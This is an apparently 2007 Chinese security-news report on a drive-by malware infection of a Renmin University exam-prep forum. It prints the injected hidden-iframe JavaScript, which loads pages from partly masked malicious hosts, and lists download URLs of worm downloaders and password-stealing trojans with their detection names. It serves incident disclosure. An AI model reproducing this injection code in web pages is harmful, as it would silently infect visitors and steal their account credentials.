当前位置：首页 > 最新报道 > 安全新闻

人大考研论坛遭黑客挂马攻击

来源：岁月联盟编辑：zhuzhu 时间：2007-12-05

12月4日，人大考研论坛网站(http://www.rendaka****.cn)被黑客植入病毒，用户如果访问该网站，会被病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序，盗取用户信息。

　　该网站的主页里被插入如下代码：

　　插入代码：

　　1. http://sns***.com/pic地址失效
　　2. http://zzs***.cn/reg 地址失效
　　3. http://taoz****.com/pic插入框架代码:

document.write("<div style='display:none'>")
　　document.write("<iframe src=
　　http://51la.wss****.com/31/5xx.htm?3></iframe>")
　　document.write("<iframe src=
　　http://www.foa***.info/ms44.htm?6326></iframe>")
　　document.write("<iframe src=
　　http://aa.lls****.com/ww/new05.htm?067?4></iframe>")
　　document.write("<iframe src=
　　http://www.900***.info/xm30.htm?258></iframe>")
　　document.write("<iframe src=
　　http://www.taozh***.com/pic/vd.htm></iframe>")
　　document.write("<iframe 　　src=http://aa.llsg***.com/ww/new263.htm?id=015></iframe>")
　　document.write("</div>")
(1). http://51la.wss****.com/31/5xx.htm?3插入框架代码：

(1).http://qqq.wss****.com/gm.htm加密网马代码：

　　下载文件: http://qqq.aishe****.com/down.exe

　　(2).http://www.foa***.info/ms44.htm?6326框架代码：

　　(1).88/881.htm关键脚本代码：

document.writeln("Cuteqq=/'http:////60.190.101.***//cd22.exe/';");
　下载文件: http://60.190.101.***/cd22.exe

　　(2).88/***.htm加密网马代码：

　　(3).88/***.htm脚本代码：

bb.js关键脚本代码：

document.writeln("document.write
　　(/'<iframe width=100 height=100 　　src=/"http:////www.foa***.info//88//bf.htm/"><//iframe>/');");
　　连接地址为：http://www.foa***.info/88/bf.htm
　　http://www.foa***.info/88/bf.htm加密网马代码

　　(3).http://aa.llsg****.com/ww/new05.htm?067?4框架代码：

　　(1). http://aa.lls****.com/aa/haha.htm加密网马，

　　下载http://down.lls****.com/bb/014.exe

　　(2). http://aa.lls****.com/aa/pps.htm加密网马代码：

　　(4).http://www.900***.info/xm30.htm?258框架代码：

(1).ee/ee1.htm关键脚本代码：
　　

document.writeln("Cuteqq=/'http:////60.190.101.***//cd22.exe/';");
　　下载文件: http://60.190.101.***/cd22.exe

(2).ee/ee3.htm加密网马代码：

　　(3).ee/***.htm脚本代码：

bb.js关键脚本代码：
　　 document.writeln("document.write(/'<iframe width=100
　　height=100 src=/"http:////www.900***.info//ee//bf.htm/">
　　<//iframe>/');
　　连接地址为：http://www.900***.info/ee/bf.htm
　　　　　　　　http://www.900***.info/ee/bf.htm加密网马代码：

　　(5).http://aa.lls****.com/ww/new263.htm?id=015框架代码：

(1). http://aa.lls****.com/aa/haha.htm
　　加密网马：下载http://down.lls****.com/bb/014.exe
　　(2). http://aa.lls****.com/aa/pps.htm加密网马代码：

　　当用户访问http://www.rendaka****.cn时, 会调用以上恶意代码!

　　使系统自动下载以下文件到本地，并运行：

http://qqq.aishe****.com/down.exe
　　病毒名(Worm.Win32.Downloader.bw) 蠕虫下载者
　　http://60.190.101.***/cd22.exe
　　病毒名(Worm.Win32.Downloader.bi) 蠕虫下载者
　　http://down.lls****.com/bb/014.exe
　　病毒名(Worm.Win32.Downloader.as) 蠕虫下载者
　　下在成功运行木马将下载以下病毒到用户的系统，并运行。
　　http://67.43.156.**/down/0.exe 地址失效
　　http://67.43.156.**/down/1.exe 地址失效
　　http://67.43.156.**/down/2.exe 地址失效
　　http://67.43.156.**/down/3.exe 地址失效
　　http://67.43.156.**/down/4.exe 地址失效
　　http://67.43.156.**/down/5.exe 地址失效
　　http://67.43.156.**/down/6.exe 地址失效
　　http://67.43.156.**/down/7.exe 地址失效
　　http://205.209.142.***/down/8.exe 地址失效
　　http://205.209.142.***/down/9.exe 地址失效
　　http://205.209.142.***/down/10.exe
　　病毒名(Trojan-PSW.Win32.OnLineGames.jes) 盗号木马
　　http://205.209.142.***/down/11.exe
　　病毒名( Trojan-PSW.Win32.OnLineGames.jiz) 盗号木马
　　http://205.209.142.***/down/13.exe
　　病毒名( Trojan-PSW.Win32.OnLineGames.jgq) 盗号木马
　　http://205.209.142.***/down/14.exe
　　病毒名( Trojan-PSW.Win32.OnLineGames.jlc) 盗号木马
　　http://205.209.142.***/down/15.exe 地址失效
　　http://205.209.142.***/down/16.exe
　　病毒名( Trojan-PSW.Win32.OnLineGames.jes) 盗号木马
　　http://205.209.142.***/down/17.exe
　　病毒名( Trojan-PSW.Win32.OnLineGames.jer) 盗号木马
　　http://205.209.142.***/down/**.exe
　　病毒名( Virus.Win32.AutoRun.aii) 感染运行病毒
　　http://205.209.142.***/down/20.exe 地址失效
　　http://205.209.142.***/down/21.exe 地址失效
　　http://205.209.142.***/down/22.exe 地址失效
　　http://205.209.142.***/down/24.exe 地址失效
　　http://205.209.142.***/down/25.exe 地址失效
　　http://205.209.142.***/down/26.exe 地址失效
　　http://60.190.101.***/aa1.exe
　　病毒名( Trojan-PSW.Win32.OnLineGames.ixl) 盗号木马
　　http://60.190.101.***/aa2.exe 地址失效
　　http://60.190.101.***/aa3.exe 地址失效
　　http://60.190.101.***/aa4.exe 地址失效
　　http://60.190.101.***/aa5.exe 地址失效
　　http://60.190.101.***/aa6.exe 地址失效
　　http://60.190.101.***/aa7.exe 地址失效
　　http://60.190.101.***/aa8.exe 地址失效
　　http://60.190.101.***/aa9.exe 地址失效
　　http://60.190.101.***/aa10.exe 地址失效
　　http://60.190.101.***/aa11.exe 地址失效
　　http://60.190.101.***/aa12.exe 地址失效
　　http://60.190.101.***/aa13.exe 地址失效
　　http://60.190.101.***/aa14.exe 地址失效
　　http://60.190.101.***/aa15.exe 地址失效
　　http://60.190.101.***/aa16.exe 地址失效
　　http://60.190.101.***/aa17.exe 地址失效
　　http://60.190.101.***/aa**.exe 地址失效
　　http://60.190.101.***/aa19.exe 地址失效
　　http://60.190.101.***/aa20.exe 地址失效
　　http://60.190.101.***/aa21.exe 地址失效
　　http://60.190.101.***/aa22.exe 地址失效
　　http://60.190.101.***/aa23.exe 地址失效
　　http://60.190.101.***/aa24.exe 地址失效
　　http://60.190.101.***/aa25.exe 地址失效
　　http://qqq.dzy***.com/wm/wm/1.exe
　　病毒名( Trojan-Dropper.Win32.Small.bbz) 辅助木马
　　http://qqq.dzy***.com/wm/wm/2.exe
　　病毒名( Trojan-PSW.Win32.OnLineGames.jbj) 盗号木马
　　http://qqq.dzy***.com/wm/wm/3.exe 地址失效
　　http://qqq.dzy***.com/wm/wm/4.exe
　　病毒名( Trojan-PSW.Win32.OnLineGames.jfk) 盗号木马
　　http://qqq.dzy***.com/wm/wm/5.exe
　　病毒名( Trojan-PSW.Win32.OnLineGames.jjj) 盗号木马
　　http://qqq.dzy***.com/wm/wm/6.exe
　　病毒名( Trojan-PSW.Win32.OnLineGames.jbm) 盗号木马
　　http://qqq.dzy***.com/wm/wm/7.exe
　　病毒名( Trojan-PSW.Win32.Lmir.bpe) 盗号木马
　　http://qqq.dzy***.com/wm/wm/8.exe
　　病毒名( Trojan-PSW.Win32.OnLineGames.jmi) 盗号木马
　　http://qqq.dzy***.com/wm/wm/9.exe
　　病毒名( Trojan-PSW.Win32.OnLineGames.ixn) 盗号木马
　　http://qqq.dzy***.com/wm/wm/10.exe 地址失效
　　http://qqq.dzy***.com/wm/wm/11.exe 地址失效
　　http://qqq.dzy***.com/wm/wm/12.exe 地址失效
　　http://qqq.dzy***.com/wm/wm/13.exe 地址失效
　　http://qqq.dzy***.com/wm/wm/14.exe 地址失效
　　http://qqq.dzy***.com/wm/wm/15.exe 地址失效
　　http://qqq.dzy***.com/wm/wm/16.exe 地址失效
　　http://qqq.dzy***.com/wm/wm/17.exe 地址失效
　　http://qqq.dzy***.com/wm/wm/**.exe 地址失效
　　http://qqq.dzy***.com/wm/wm/19.exe
　　病毒名( Trojan-Downloader.Win32.Cryptic.ic) 下载者木马
　　http://qqq.dzy***.com/wm/wm/20.exe 地址失效